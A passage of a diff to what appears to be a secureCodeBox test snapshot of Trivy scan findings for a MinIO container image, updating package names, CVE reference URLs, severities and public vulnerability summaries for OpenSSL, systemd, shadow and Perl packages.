'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0465", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0465", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", @@ -67936,6 +68757,8 @@ and the severity is therefore considered low.", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -67946,7 +68769,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be + "description": +"Applications that use a non-default option when verifying certificates may be vulnerable to an attack from a malicious CA to circumvent certain checks. Invalid certificate policies in leaf certificates are silently ignored by @@ -67956,7 +68780,8 @@ in order to circumvent policy checking on the certificate altogether. Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Invalid certificate policies in leaf certificates are silently ignored", @@ -67989,6 +68814,14 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -68026,7 +68859,7 @@ the \`-policy' argument to the command line utilities or by calling the "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0466", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0466", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", @@ -68034,6 +68867,8 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", "https://security.netapp.com/advisory/ntap-20230414-0001/", @@ -68044,7 +68879,8 @@ the \`-policy' argument to the command line utilities or by calling the ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to implicitly enable the certificate policy check when doing certificate verification. However the implementation of the function does not enable the check which allows certificates with invalid or incorrect @@ -68060,7 +68896,8 @@ enable the policy check by calling X509_VERIFY_PARAM_set_flags() with the X509_V_FLAG_POLICY_CHECK flag argument. Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", +commonly used by applications." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Certificate policy check not enabled", @@ -68093,6 +68930,14 @@ commonly used by applications.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -68130,7 +68975,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2007-6755", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", @@ -68208,7 +69053,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2010-0928", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", @@ -68272,501 +69117,405 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "247.3-7+deb11u2", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", - }, - { - "type": "URL", - "value": "http://secunia.com/advisories/27215", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "247.3-7+deb11u2", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", - }, - { - "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", - }, - { - "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31484", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://github.com/andk/cpanpm/pull/175", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://metacpan.org/dist/CPAN/changes", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-1", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6112-2", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-4116", - "installedVersion": "5.32.1-4+deb11u2", - "packageName": "perl-base", + "id": "CVE-2023-31437", + "installedVersion": "247.3-7", + "packageName": "libsystemd0", "references": [ - "http://www.openwall.com/lists/oss-security/2011/11/04/2", - "http://www.openwall.com/lists/oss-security/2011/11/04/4", - "https://access.redhat.com/security/cve/CVE-2011-4116", - "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", - 